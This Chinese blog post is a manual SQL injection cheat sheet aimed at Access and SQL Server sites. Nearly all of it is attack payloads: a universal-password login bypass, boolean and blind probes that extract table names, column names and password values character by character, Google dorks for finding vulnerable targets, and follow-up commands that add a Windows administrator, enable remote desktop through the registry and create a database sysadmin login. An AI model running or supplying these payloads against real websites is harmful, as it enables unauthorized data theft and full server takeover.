ACCESS+MYSQL手工注入

最新推荐文章于 2025-03-26 20:13:29 发布

Xyntax

最新推荐文章于 2025-03-26 20:13:29 发布

阅读量1.3k

点赞数

分类专栏：信息安全

本文链接：https://blog.youkuaiyun.com/cd_xuyue/article/details/49228519

版权

8 篇文章

订阅专栏

查询语句
select * from stuinfo where name='aa' where address like "%北京朝阳区%"
后台登录：万能密码
username:'or'='or'
防止语句出错：注释符：–
username=’()’
注入判断: ’
www.xx.com/a.asp?id=1 and 1=1正常
and 1=2 错误
username:admin and 1=2
判断表名：admin
and (select count(*) from admin)>0
判断字段名：username,password
admin_user admin_pwd
and (select count(admin_user) from admin)>0
猜解值的长度：admin_user=5 admin_pwd=16
and (select len(admin_user) from admin)=4依次尝试
猜属性值：
and (select left(admin_user,1) from admin)='a'
在’ ‘中依次尝试字母数字
and (select left(admin_user,2) from admin)='ad'
and (select left(admin_user,3) from admin)='adm'
自动化工具：
sqlmap,domain,nbsi2,hdsi,ad,sqlguess,pangolin
自动挖注入漏洞：
ad:批量分析注入点：www.google.com
inurl:com asp+id

判断注入点：
and 1=1 and 1=2
猜版本：
and @@version>0
猜用户名：
and user>0
猜当前连接数据库:article
and db_name()>0
猜解其它数据库：
and (select name from master.dbo.sysdatabases where dbid=6)>1
猜第一个表名：’admin’
and (select top 1 name from sysobjects where xtype='u' and status>0 )>0
猜其他表名：’t_jiaozhu’
and (select top 1 name from sysobjects where xtype='u' and status>0 and name not in('admin'))>0
猜字段：username,password
and (Select Top 1 col_name(object_id('admin'),1) from sysobjects)>0
猜值
and (select username from admin)>0
破解密码MD5或者更改密码MD5值
自动化工具

建立系统用户：
net user username pass /add
系统提权
net localgroup administrators username /add
打开3389
reg add "hklm\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d "0" /f
建立数据库用户：
;exec master..sp_addlogin user,pass;--
数据库提权：
;exec master..sp_addsrvrolemember aa,sysadmin;--